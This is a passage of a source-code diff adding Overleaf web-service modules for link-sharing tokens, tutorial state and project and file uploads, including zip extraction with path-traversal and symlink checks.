hashPrefixStatus = 'missing' + } else { + const expectedHashPrefix = TokenAccessHandler.createTokenHashPrefix(token) + if (expectedHashPrefix === tokenHashPrefix) { + hashPrefixStatus = 'match' + } else if (isSuspectedV1Format) { + hashPrefixStatus = 'mismatch-v1-format' + } else { + hashPrefixStatus = 'mismatch' + } + } + + if (hashPrefixStatus === 'mismatch') { + logger.info( + { + tokenHashPrefix, + hashPrefixStatus, + userId, + ...logData, + type, + }, + 'mismatched token hash prefix' + ) + } + + Metrics.inc('link-sharing.hash-check', { + path: type, + status: hashPrefixStatus, + }) + }, +} + +module.exports = { + ...TokenAccessHandler, + ...callbackifyAll(TokenAccessHandler, { + multiResult: { + validateTokenForAnonymousAccess: [ + 'isValidReadAndWrite', + 'isValidReadOnly', + ], + }, + without: [ + 'makeTokenUrl', + 'getTokenType', + 'isReadOnlyToken', + 'isReadAndWriteToken', + 'isValidToken', + 'tokenAccessEnabledForProject', + 'grantSessionTokenAccess', + 'getRequestToken', + 'createTokenHashPrefix', + 'normalizeTokenHashPrefix', + 'checkTokenHashPrefix', + '_makeReadAndWriteTokenUrl', + '_makeReadOnlyTokenUrl', + '_projectFindOne', + '_extractNumericPrefix', + '_extractStringSuffix', + ], + }), + promises: TokenAccessHandler, +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs b/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs new file mode 100644 index 0000000..3f15650 --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs @@ -0,0 +1,31 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import TokenAccessController from './TokenAccessController.mjs' + +export default { + apply(webRouter) { + webRouter.get( + `/project/:Project_id/sharing-updates`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.sharingUpdatesConsent + ) + + webRouter.post( + `/project/:Project_id/sharing-updates/join`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.moveReadWriteToCollaborators + ) + + webRouter.post( + `/project/:Project_id/sharing-updates/view`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.moveReadWriteToReadOnly + ) + }, +} diff --git a/services/web/app/src/Features/TokenGenerator/TokenGenerator.js b/services/web/app/src/Features/TokenGenerator/TokenGenerator.js new file mode 100644 index 0000000..b9ebf16 --- /dev/null +++ b/services/web/app/src/Features/TokenGenerator/TokenGenerator.js @@ -0,0 +1,109 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
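+//
+// Shapes of the tokens generated below (illustrative values, not real
+// tokens):
+//   readOnlyToken()     -> 'bcdfghjkmnpq' (12 lower-case consonants)
+//   readAndWriteToken() -> { token: '1234567891bcdfghjkmnpq',
+//                            numericPrefix: '1234567891' }
+// These match READ_ONLY_TOKEN_PATTERN '([a-z]{12})' and
+// READ_AND_WRITE_TOKEN_PATTERN '([0-9]+[a-z]{6,12})' in TokenAccessHandler.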
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const crypto = require('crypto')
+const V1Api = require('../V1/V1Api')
+const Features = require('../../infrastructure/Features')
+const Async = require('async')
+const { promisify } = require('util')
+
+// (From Overleaf `random_token.rb`)
+// Letters (not numbers! see generate_token) used in tokens. They're all
+// consonants, to avoid embarrassing words (I can't think of any that use only
+// a y), and lower case "l" is omitted, because in many fonts it is
+// indistinguishable from an upper case "I" (and sometimes even the number 1).
+const TOKEN_LOWERCASE_ALPHA = 'bcdfghjkmnpqrstvwxyz'
+const TOKEN_NUMERICS = '123456789'
+const TOKEN_ALPHANUMERICS =
+  TOKEN_LOWERCASE_ALPHA + TOKEN_LOWERCASE_ALPHA.toUpperCase() + TOKEN_NUMERICS
+
+// This module mirrors the token generation in Overleaf (`random_token.rb`),
+// for the purposes of implementing token-based project access, like the
+// 'unlisted-projects' feature in Overleaf
+
+const TokenGenerator = {
+  _randomString(length, alphabet) {
+    const result = crypto
+      .randomBytes(length)
+      .toJSON()
+      .data.map(b => alphabet[b % alphabet.length])
+      .join('')
+    return result
+  },
+
+  // Generate a 12-char token with only characters from TOKEN_LOWERCASE_ALPHA,
+  // suitable for use as a read-only token for a project
+  readOnlyToken() {
+    return TokenGenerator._randomString(12, TOKEN_LOWERCASE_ALPHA)
+  },
+
+  // Generate a longer token, with a numeric prefix,
+  // suitable for use as a read-and-write token for a project
+  readAndWriteToken() {
+    const numerics = TokenGenerator._randomString(10, TOKEN_NUMERICS)
+    const token = TokenGenerator._randomString(12, TOKEN_LOWERCASE_ALPHA)
+    const fullToken = `${numerics}${token}`
+    return { token: fullToken, numericPrefix: numerics }
+  },
+
+  generateReferralId() {
+    return TokenGenerator._randomString(16, TOKEN_ALPHANUMERICS)
+  },
+
+  generateUniqueReadOnlyToken(callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    return Async.retry(
+      10,
+      function (cb) {
+        const token = TokenGenerator.readOnlyToken()
+
+        if (!Features.hasFeature('saas')) {
+          return cb(null, token)
+        }
+
+        return V1Api.request(
+          {
+            url: `/api/v1/overleaf/docs/read_token/${token}/exists`,
+            json: true,
+          },
+          function (err, response, body) {
+            if (err != null) {
+              return cb(err)
+            }
+            if (response.statusCode !== 200) {
+              return cb(
+                new Error(
+                  `non-200 response from v1 read-token-exists api: ${response.statusCode}`
+                )
+              )
+            }
+            if (body.exists === true) {
+              return cb(new Error(`token already exists in v1: ${token}`))
+            } else {
+              return cb(null, token)
+            }
+          }
+        )
+      },
+      callback
+    )
+  },
+}
+
+TokenGenerator.promises = {
+  generateUniqueReadOnlyToken: promisify(
+    TokenGenerator.generateUniqueReadOnlyToken
+  ),
+}
+module.exports = TokenGenerator
diff --git a/services/web/app/src/Features/Tutorial/TutorialController.mjs b/services/web/app/src/Features/Tutorial/TutorialController.mjs
new file mode 100644
index 0000000..9afb5bb
--- /dev/null
+++ b/services/web/app/src/Features/Tutorial/TutorialController.mjs
@@ -0,0 +1,52 @@
+import SessionManager from '../Authentication/SessionManager.js'
+import TutorialHandler from './TutorialHandler.js'
+import { expressify } from '@overleaf/promise-utils'
+
+const VALID_KEYS = [
+  'react-history-buttons-tutorial',
+  
'writefull-integration', + 'writefull-oauth-promotion', + 'bib-file-tpr-prompt', + 'ai-error-assistant-consent', + 'history-restore-promo', + 'us-gov-banner', + 'us-gov-banner-fedramp', +] + +async function completeTutorial(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const tutorialKey = req.params.tutorialKey + + if (!VALID_KEYS.includes(tutorialKey)) { + return res.sendStatus(404) + } + + await TutorialHandler.setTutorialState(userId, tutorialKey, 'completed') + res.sendStatus(204) +} + +async function postponeTutorial(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const tutorialKey = req.params.tutorialKey + let postponedUntil + if (req.body.postponedUntil) { + postponedUntil = new Date(req.body.postponedUntil) + } + + if (!VALID_KEYS.includes(tutorialKey)) { + return res.sendStatus(404) + } + + await TutorialHandler.setTutorialState( + userId, + tutorialKey, + 'postponed', + postponedUntil + ) + res.sendStatus(204) +} + +export default { + completeTutorial: expressify(completeTutorial), + postponeTutorial: expressify(postponeTutorial), +} diff --git a/services/web/app/src/Features/Tutorial/TutorialHandler.js b/services/web/app/src/Features/Tutorial/TutorialHandler.js new file mode 100644 index 0000000..6ffe9aa --- /dev/null +++ b/services/web/app/src/Features/Tutorial/TutorialHandler.js @@ -0,0 +1,62 @@ +const UserUpdater = require('../User/UserUpdater') + +const POSTPONE_DURATION_MS = 24 * 60 * 60 * 1000 // 1 day + +/** + * Change the tutorial state + * + * @param {string} userId + * @param {string} tutorialKey + * @param {'completed' | 'postponed'} state + * @param {Date} [postponedUntil] - The date until which the tutorial is postponed + */ +async function setTutorialState( + userId, + tutorialKey, + state, + postponedUntil = null +) { + const updateData = { + state, + updatedAt: new Date(), + } + + if (state === 'postponed' && postponedUntil) { + updateData.postponedUntil = postponedUntil + } + + await UserUpdater.promises.updateUser(userId, { + $set: { + [`completedTutorials.${tutorialKey}`]: updateData, + }, + }) +} + +/** + * Returns a list of inactive tutorials for a given user + * + * The user must be loaded with the completedTutorials property. + */ +function getInactiveTutorials(user, tutorialKey) { + const inactiveTutorials = [] + for (const [key, record] of Object.entries(user.completedTutorials ?? {})) { + if (record instanceof Date) { + // Legacy format: single date means the tutorial was completed + inactiveTutorials.push(key) + } else if (record.state === 'postponed') { + const defaultPostponedUntil = new Date( + record.updatedAt.getTime() + POSTPONE_DURATION_MS + ) + + const postponedUntil = record.postponedUntil ?? 
defaultPostponedUntil + if (new Date() < postponedUntil) { + inactiveTutorials.push(key) + } + } else { + inactiveTutorials.push(key) + } + } + return inactiveTutorials +} + +module.exports = { setTutorialState, getInactiveTutorials } diff --git a/services/web/app/src/Features/Uploads/ArchiveErrors.js b/services/web/app/src/Features/Uploads/ArchiveErrors.js new file mode 100644 index 0000000..d78941e --- /dev/null +++ b/services/web/app/src/Features/Uploads/ArchiveErrors.js @@ -0,0 +1,34 @@ +const Errors = require('../Errors/Errors') + +class InvalidZipFileError extends Errors.BackwardCompatibleError { + constructor(options) { + super({ + message: 'invalid_zip_file', + ...options, + }) + } +} + +class EmptyZipFileError extends InvalidZipFileError { + constructor(options) { + super({ + message: 'empty_zip_file', + ...options, + }) + } +} + +class ZipContentsTooLargeError extends InvalidZipFileError { + constructor(options) { + super({ + message: 'zip_contents_too_large', + ...options, + }) + } +} + +module.exports = { + InvalidZipFileError, + EmptyZipFileError, + ZipContentsTooLargeError, +} diff --git a/services/web/app/src/Features/Uploads/ArchiveManager.js b/services/web/app/src/Features/Uploads/ArchiveManager.js new file mode 100644 index 0000000..fc81fdb --- /dev/null +++ b/services/web/app/src/Features/Uploads/ArchiveManager.js @@ -0,0 +1,270 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const metrics = require('@overleaf/metrics') +const fs = require('fs') +const Path = require('path') +const yauzl = require('yauzl') +const Settings = require('@overleaf/settings') +const { + InvalidZipFileError, + EmptyZipFileError, + ZipContentsTooLargeError, +} = require('./ArchiveErrors') +const _ = require('lodash') +const { promisifyAll } = require('@overleaf/promise-utils') + +const ONE_MEG = 1024 * 1024 + +const ArchiveManager = { + _isZipTooLarge(source, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + let totalSizeInBytes = null + return yauzl.open(source, { lazyEntries: true }, function (err, zipfile) { + if (err != null) { + return callback(new InvalidZipFileError().withCause(err)) + } + + if ( + Settings.maxEntitiesPerProject != null && + zipfile.entryCount > Settings.maxEntitiesPerProject + ) { + return callback(null, true) // too many files in zip file + } + + zipfile.on('error', callback) + + // read all the entries + zipfile.readEntry() + zipfile.on('entry', function (entry) { + totalSizeInBytes += entry.uncompressedSize + return zipfile.readEntry() + }) // get the next entry + + // no more entries to read + return zipfile.on('end', function () { + if (totalSizeInBytes == null || isNaN(totalSizeInBytes)) { + logger.warn( + { source, totalSizeInBytes }, + 'error getting bytes of zip' + ) + return callback( + new InvalidZipFileError({ info: { totalSizeInBytes } }) + ) + } + const isTooLarge = totalSizeInBytes > ONE_MEG * 300 + return callback(null, isTooLarge) + }) + }) + }, + + _checkFilePath(entry, destination, 
callback) { + // transform backslashes to forwardslashes to accommodate badly-behaved zip archives + if (callback == null) { + callback = function () {} + } + const transformedFilename = entry.fileName.replace(/\\/g, '/') + // check if the entry is a directory + const endsWithSlash = /\/$/ + if (endsWithSlash.test(transformedFilename)) { + return callback() // don't give a destfile for directory + } + // check that the file does not use a relative path + for (const dir of Array.from(transformedFilename.split('/'))) { + if (dir === '..') { + return callback(new Error('relative path')) + } + } + // check that the destination file path is normalized + const dest = `${destination}/${transformedFilename}` + if (dest !== Path.normalize(dest)) { + return callback(new Error('unnormalized path')) + } else { + return callback(null, dest) + } + }, + + _writeFileEntry(zipfile, entry, destFile, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + return zipfile.openReadStream(entry, function (err, readStream) { + if (err != null) { + return callback(err) + } + readStream.on('error', callback) + readStream.on('end', callback) + + const errorHandler = function (err) { + // clean up before calling callback + readStream.unpipe() + readStream.destroy() + return callback(err) + } + + fs.mkdir(Path.dirname(destFile), { recursive: true }, function (err) { + if (err != null) { + return errorHandler(err) + } + const writeStream = fs.createWriteStream(destFile) + writeStream.on('error', errorHandler) + return readStream.pipe(writeStream) + }) + }) + }, + + _extractZipFiles(source, destination, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + return yauzl.open(source, { lazyEntries: true }, function (err, zipfile) { + if (err != null) { + return callback(err) + } + zipfile.on('error', callback) + // read all the entries + zipfile.readEntry() + + let entryFileCount = 0 + zipfile.on('entry', function (entry) { + return ArchiveManager._checkFilePath( + entry, + destination, + function (err, destFile) { + if (err != null) { + logger.warn( + { err, source, destination }, + 'skipping bad file path' + ) + zipfile.readEntry() // bad path, just skip to the next file + return + } + if (destFile != null) { + // only write files + return ArchiveManager._writeFileEntry( + zipfile, + entry, + destFile, + function (err) { + if (err != null) { + OError.tag(err, 'error unzipping file entry', { + source, + destFile, + }) + zipfile.close() // bail out, stop reading file entries + return callback(err) + } else { + entryFileCount++ + return zipfile.readEntry() + } + } + ) // continue to the next file + } else { + // if it's a directory, continue + return zipfile.readEntry() + } + } + ) + }) + // no more entries to read + return zipfile.on('end', () => { + if (entryFileCount > 0) { + callback() + } else { + callback(new EmptyZipFileError()) + } + }) + }) + }, + + extractZipArchive(source, destination, _callback) { + if (_callback == null) { + _callback = function () {} + } + const callback = function (...args) { + _callback(...Array.from(args || [])) + return (_callback = function () {}) + } + + return ArchiveManager._isZipTooLarge(source, function (err, isTooLarge) { + if (err != null) { + OError.tag(err, 'error checking size of zip file') + return callback(err) + } + + if (isTooLarge) { + return callback(new ZipContentsTooLargeError()) + } + + const timer = new metrics.Timer('unzipDirectory') + logger.debug({ source, destination 
}, 'unzipping file')
+
+      return ArchiveManager._extractZipFiles(
+        source,
+        destination,
+        function (err) {
+          timer.done()
+          if (err != null) {
+            OError.tag(err, 'unzip failed', {
+              source,
+              destination,
+            })
+            return callback(err)
+          } else {
+            return callback()
+          }
+        }
+      )
+    })
+  },
+
+  findTopLevelDirectory(directory, callback) {
+    if (callback == null) {
+      callback = function () {}
+    }
+    return fs.readdir(directory, function (error, files) {
+      if (error != null) {
+        return callback(error)
+      }
+      if (files.length === 1) {
+        const childPath = Path.join(directory, files[0])
+        return fs.stat(childPath, function (error, stat) {
+          if (error != null) {
+            return callback(error)
+          }
+          if (stat.isDirectory()) {
+            return callback(null, childPath)
+          } else {
+            return callback(null, directory)
+          }
+        })
+      } else {
+        return callback(null, directory)
+      }
+    })
+  },
+}
+
+ArchiveManager.promises = promisifyAll(ArchiveManager)
+module.exports = ArchiveManager
diff --git a/services/web/app/src/Features/Uploads/FileSystemImportManager.js b/services/web/app/src/Features/Uploads/FileSystemImportManager.js
new file mode 100644
index 0000000..22533af
--- /dev/null
+++ b/services/web/app/src/Features/Uploads/FileSystemImportManager.js
@@ -0,0 +1,259 @@
+const fs = require('fs')
+const Path = require('path')
+const { callbackify } = require('util')
+const EditorController = require('../Editor/EditorController')
+const Errors = require('../Errors/Errors')
+const FileTypeManager = require('./FileTypeManager')
+const SafePath = require('../Project/SafePath')
+const logger = require('@overleaf/logger')
+
+module.exports = {
+  addEntity: callbackify(addEntity),
+  importDir: callbackify(importDir),
+  importFile: callbackify(importFile),
+  promises: {
+    addEntity,
+    importDir,
+    importFile,
+  },
+}
+
+async function addDoc(userId, projectId, folderId, name, lines, replace) {
+  if (replace) {
+    const doc = await EditorController.promises.upsertDoc(
+      projectId,
+      folderId,
+      name,
+      lines,
+      'upload',
+      userId
+    )
+    return doc
+  } else {
+    const doc = await EditorController.promises.addDoc(
+      projectId,
+      folderId,
+      name,
+      lines,
+      'upload',
+      userId
+    )
+    return doc
+  }
+}
+
+async function addFile(userId, projectId, folderId, name, path, replace) {
+  if (replace) {
+    const file = await EditorController.promises.upsertFile(
+      projectId,
+      folderId,
+      name,
+      path,
+      null,
+      'upload',
+      userId
+    )
+    return file
+  } else {
+    const file = await EditorController.promises.addFile(
+      projectId,
+      folderId,
+      name,
+      path,
+      null,
+      'upload',
+      userId
+    )
+    return file
+  }
+}
+
+async function addFolder(userId, projectId, folderId, name, path, replace) {
+  const newFolder = await EditorController.promises.addFolder(
+    projectId,
+    folderId,
+    name,
+    'upload',
+    userId
+  )
+  await addFolderContents(userId, projectId, newFolder._id, path, replace)
+  return newFolder
+}
+
+async function addFolderContents(
+  userId,
+  projectId,
+  parentFolderId,
+  folderPath,
+  replace
+) {
+  if (!(await _isSafeOnFileSystem(folderPath))) {
+    logger.debug(
+      { userId, projectId, parentFolderId, folderPath },
+      'add folder contents is from symlink, stopping insert'
+    )
+    throw new Error('path is symlink')
+  }
+  const entries = (await fs.promises.readdir(folderPath)) || []
+  for (const entry of entries) {
+    if (await FileTypeManager.promises.shouldIgnore(entry)) {
+      continue
+    }
+    await addEntity(
+      userId,
+      projectId,
+      parentFolderId,
+      entry,
+      `${folderPath}/${entry}`,
+      replace
+    )
+  }
+}
+
+async function addEntity(userId, projectId, 
folderId, name, fsPath, replace) { + if (!(await _isSafeOnFileSystem(fsPath))) { + logger.debug( + { userId, projectId, folderId, fsPath }, + 'add entry is from symlink, stopping insert' + ) + throw new Error('path is symlink') + } + + if (await FileTypeManager.promises.isDirectory(fsPath)) { + const newFolder = await addFolder( + userId, + projectId, + folderId, + name, + fsPath, + replace + ) + return newFolder + } + + // Here, we cheat a little bit and provide the project path relative to the + // folder, not the root of the project. This is because we don't know for sure + // at this point what the final path of the folder will be. The project path + // is still important for importFile() to be able to figure out if the file is + // a binary file or an editable document. + const projectPath = Path.join('/', name) + const importInfo = await importFile(fsPath, projectPath) + switch (importInfo.type) { + case 'file': { + const entity = await addFile( + userId, + projectId, + folderId, + name, + importInfo.fsPath, + replace + ) + if (entity != null) { + entity.type = 'file' + } + return entity + } + case 'doc': { + const entity = await addDoc( + userId, + projectId, + folderId, + name, + importInfo.lines, + replace + ) + if (entity != null) { + entity.type = 'doc' + } + return entity + } + default: { + throw new Error(`unknown import type: ${importInfo.type}`) + } + } +} + +async function _isSafeOnFileSystem(path) { + // Use lstat() to ensure we don't follow symlinks. Symlinks from an + // untrusted source are dangerous. + const stat = await fs.promises.lstat(path) + return stat.isFile() || stat.isDirectory() +} + +async function importFile(fsPath, projectPath) { + const stat = await fs.promises.lstat(fsPath) + if (!stat.isFile()) { + throw new Error(`can't import ${fsPath}: not a regular file`) + } + _validateProjectPath(projectPath) + const filename = Path.basename(projectPath) + + const { binary, encoding } = await FileTypeManager.promises.getType( + filename, + fsPath, + null + ) + if (binary) { + return new FileImport(projectPath, fsPath) + } else { + const content = await fs.promises.readFile(fsPath, encoding) + // Handle Unix, DOS and classic Mac newlines + const lines = content.split(/\r\n|\n|\r/) + return new DocImport(projectPath, lines) + } +} + +async function importDir(dirPath) { + const stat = await fs.promises.lstat(dirPath) + if (!stat.isDirectory()) { + throw new Error(`can't import ${dirPath}: not a directory`) + } + const entries = [] + for await (const filePath of _walkDir(dirPath)) { + const projectPath = Path.join('/', Path.relative(dirPath, filePath)) + const importInfo = await importFile(filePath, projectPath) + entries.push(importInfo) + } + return entries +} + +function _validateProjectPath(path) { + if (!SafePath.isAllowedLength(path) || !SafePath.isCleanPath(path)) { + throw new Errors.InvalidNameError(`Invalid path: ${path}`) + } +} + +async function* _walkDir(dirPath) { + const entries = await fs.promises.readdir(dirPath) + for (const entry of entries) { + const entryPath = Path.join(dirPath, entry) + if (await FileTypeManager.promises.shouldIgnore(entryPath)) { + continue + } + + // Use lstat() to ensure we don't follow symlinks. Symlinks from an + // untrusted source are dangerous. 
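+    // (lstat reports on the link itself, so a symlink is neither a regular
+    // file nor a directory below and is skipped rather than followed)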
+    const stat = await fs.promises.lstat(entryPath)
+    if (stat.isFile()) {
+      yield entryPath
+    } else if (stat.isDirectory()) {
+      yield* _walkDir(entryPath)
+    }
+  }
+}
+
+class FileImport {
+  constructor(projectPath, fsPath) {
+    this.type = 'file'
+    this.projectPath = projectPath
+    this.fsPath = fsPath
+  }
+}
+
+class DocImport {
+  constructor(projectPath, lines) {
+    this.type = 'doc'
+    this.projectPath = projectPath
+    this.lines = lines
+  }
+}
diff --git a/services/web/app/src/Features/Uploads/FileTypeManager.js b/services/web/app/src/Features/Uploads/FileTypeManager.js
new file mode 100644
index 0000000..5dc7ebb
--- /dev/null
+++ b/services/web/app/src/Features/Uploads/FileTypeManager.js
@@ -0,0 +1,111 @@
+const fs = require('fs')
+const Path = require('path')
+const isUtf8 = require('utf-8-validate')
+const { promisifyAll } = require('@overleaf/promise-utils')
+const Settings = require('@overleaf/settings')
+const Minimatch = require('minimatch').Minimatch
+
+const fileIgnoreMatcher = new Minimatch(Settings.fileIgnorePattern, {
+  nocase: true, // make the whole path matching case-insensitive
+  // (previously we were only matching the extension case-insensitively but it seems safer to match the whole path)
+  dot: true, // allows matching on paths containing a dot e.g. /.git/foo/bar.txt
+})
+
+const FileTypeManager = {
+  TEXT_EXTENSIONS: new Set(Settings.textExtensions.map(ext => `.${ext}`)),
+  EDITABLE_FILENAMES: Settings.editableFilenames,
+
+  MAX_TEXT_FILE_SIZE: 3 * Settings.max_doc_length, // allow 3 bytes for every character
+
+  isDirectory(path, callback) {
+    fs.stat(path, (error, stats) => {
+      if (error != null) {
+        return callback(error)
+      }
+      callback(null, stats.isDirectory())
+    })
+  },
+
+  // returns charset as understood by fs.readFile,
+  getType(name, fsPath, existingFileType, callback) {
+    if (!name) {
+      return callback(
+        new Error(
+          '[FileTypeManager] getType requires a non-null "name" parameter'
+        )
+      )
+    }
+    if (!fsPath) {
+      return callback(
+        new Error(
+          '[FileTypeManager] getType requires a non-null "fsPath" parameter'
+        )
+      )
+    }
+    const basename = Path.basename(name)
+    if (existingFileType !== 'doc' && !_isTextFilename(basename)) {
+      return callback(null, { binary: true })
+    }
+
+    fs.stat(fsPath, (err, stat) => {
+      if (err != null) {
+        return callback(err)
+      }
+      if (stat.size > FileTypeManager.MAX_TEXT_FILE_SIZE) {
+        return callback(null, { binary: true }) // Treat large text file as binary
+      }
+
+      fs.readFile(fsPath, (err, bytes) => {
+        if (err != null) {
+          return callback(err)
+        }
+        const encoding = _detectEncoding(bytes)
+        const text = bytes.toString(encoding)
+        if (text.length >= Settings.max_doc_length) {
+          return callback(null, { binary: true }) // Treat large text file as binary
+        }
+        // For compatibility with the history service, only accept valid utf8 with no
+        // nulls or non-BMP characters as text, everything else is binary.
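+        // For example, an emoji is encoded as a surrogate pair in a JavaScript
+        // string, so any file containing one is treated as binary here.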
+ if (text.includes('\x00')) { + return callback(null, { binary: true }) + } + if (/[\uD800-\uDFFF]/.test(text)) { + // non-BMP characters (high and low surrogate characters) + return callback(null, { binary: true }) + } + callback(null, { binary: false, encoding }) + }) + }) + }, + + // FIXME: we can convert this to a synchronous function if we want to + shouldIgnore(path, callback) { + // use minimatch file matching to check if the path should be ignored + const ignore = fileIgnoreMatcher.match(path) + callback(null, ignore) + }, +} + +function _isTextFilename(filename) { + const extension = Path.extname(filename).toLowerCase() + return ( + FileTypeManager.TEXT_EXTENSIONS.has(extension) || + FileTypeManager.EDITABLE_FILENAMES.includes(filename.toLowerCase()) + ) +} + +function _detectEncoding(bytes) { + if (isUtf8(bytes)) { + return 'utf-8' + } + // check for little-endian unicode bom (nodejs does not support big-endian) + if (bytes[0] === 0xff && bytes[1] === 0xfe) { + return 'utf-16le' + } + return 'latin1' +} + +module.exports = FileTypeManager +module.exports.promises = promisifyAll(FileTypeManager, { + without: ['getStrictTypeFromContent'], +}) diff --git a/services/web/app/src/Features/Uploads/ProjectUploadController.mjs b/services/web/app/src/Features/Uploads/ProjectUploadController.mjs new file mode 100644 index 0000000..a3bc434 --- /dev/null +++ b/services/web/app/src/Features/Uploads/ProjectUploadController.mjs @@ -0,0 +1,174 @@ +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import fs from 'node:fs' +import Path from 'node:path' +import FileSystemImportManager from './FileSystemImportManager.js' +import ProjectUploadManager from './ProjectUploadManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import EditorController from '../Editor/EditorController.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import Settings from '@overleaf/settings' +import { InvalidZipFileError } from './ArchiveErrors.js' +import multer from 'multer' +import lodash from 'lodash' +import { expressify } from '@overleaf/promise-utils' +import { DuplicateNameError } from '../Errors/Errors.js' + +const defaultsDeep = lodash.defaultsDeep + +const upload = multer( + defaultsDeep( + { + dest: Settings.path.uploadFolder, + limits: { + fileSize: Settings.maxUploadSize, + }, + }, + Settings.multerOptions + ) +) + +function uploadProject(req, res, next) { + const timer = new metrics.Timer('project-upload') + const userId = SessionManager.getLoggedInUserId(req.session) + const { path } = req.file + const name = Path.basename(req.body.name, '.zip') + return ProjectUploadManager.createProjectFromZipArchive( + userId, + name, + path, + function (error, project) { + fs.unlink(path, function () {}) + timer.done() + if (error != null) { + logger.error( + { err: error, filePath: path, fileName: name }, + 'error uploading project' + ) + if (error instanceof InvalidZipFileError) { + return res.status(422).json({ + success: false, + error: req.i18n.translate(error.message), + }) + } else { + return res.status(500).json({ + success: false, + error: req.i18n.translate('upload_failed'), + }) + } + } else { + return res.json({ success: true, project_id: project._id }) + } + } + ) +} + +async function uploadFile(req, res, next) { + const timer = new metrics.Timer('file-upload') + const name = req.body.name + const path = req.file?.path + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + let { 
folder_id: folderId } = req.query + if (name == null || name.length === 0 || name.length > 150) { + return res.status(422).json({ + success: false, + error: 'invalid_filename', + }) + } + + // preserve the directory structure from an uploaded folder + const { relativePath } = req.body + // NOTE: Uppy sends a "null" string for `relativePath` when the file is not nested in a folder + if (relativePath && relativePath !== 'null') { + const { path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + }) + const { lastFolder } = await EditorController.promises.mkdirp( + projectId, + Path.dirname(Path.join('/', path.fileSystem, relativePath)), + userId + ) + folderId = lastFolder._id + } + + return FileSystemImportManager.addEntity( + userId, + projectId, + folderId, + name, + path, + true, + function (error, entity) { + fs.unlink(path, function () {}) + timer.done() + if (error != null) { + if (error.name === 'InvalidNameError') { + return res.status(422).json({ + success: false, + error: 'invalid_filename', + }) + } else if (error instanceof DuplicateNameError) { + return res.status(422).json({ + success: false, + error: 'duplicate_file_name', + }) + } else if (error.message === 'project_has_too_many_files') { + return res.status(422).json({ + success: false, + error: 'project_has_too_many_files', + }) + } else if (error.message === 'folder_not_found') { + return res.status(422).json({ + success: false, + error: 'folder_not_found', + }) + } else { + logger.error( + { + err: error, + projectId, + filePath: path, + fileName: name, + folderId, + }, + 'error uploading file' + ) + return res.status(422).json({ success: false }) + } + } else { + return res.json({ + success: true, + entity_id: entity?._id, + entity_type: entity?.type, + hash: entity?.hash, + }) + } + } + ) +} + +function multerMiddleware(req, res, next) { + if (upload == null) { + return res + .status(500) + .json({ success: false, error: req.i18n.translate('upload_failed') }) + } + return upload.single('qqfile')(req, res, function (err) { + if (err instanceof multer.MulterError && err.code === 'LIMIT_FILE_SIZE') { + return res + .status(422) + .json({ success: false, error: req.i18n.translate('file_too_large') }) + } + + return next(err) + }) +} + +export default { + uploadProject, + uploadFile: expressify(uploadFile), + multerMiddleware, +} diff --git a/services/web/app/src/Features/Uploads/ProjectUploadManager.js b/services/web/app/src/Features/Uploads/ProjectUploadManager.js new file mode 100644 index 0000000..d42bc0e --- /dev/null +++ b/services/web/app/src/Features/Uploads/ProjectUploadManager.js @@ -0,0 +1,217 @@ +const Path = require('path') +const fs = require('fs') +const { callbackify } = require('util') +const ArchiveManager = require('./ArchiveManager') +const { Doc } = require('../../models/Doc') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentHelper = require('../Documents/DocumentHelper') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const FileSystemImportManager = require('./FileSystemImportManager') +const ProjectCreationHandler = require('../Project/ProjectCreationHandler') +const ProjectEntityMongoUpdateHandler = require('../Project/ProjectEntityMongoUpdateHandler') +const ProjectRootDocManager = require('../Project/ProjectRootDocManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') 
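+// Overall flow: extract the zip to a temporary directory, create a blank
+// project, import the extracted contents, then flush the project to the
+// third-party datastore; if any import step fails, the half-created project
+// is deleted again.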
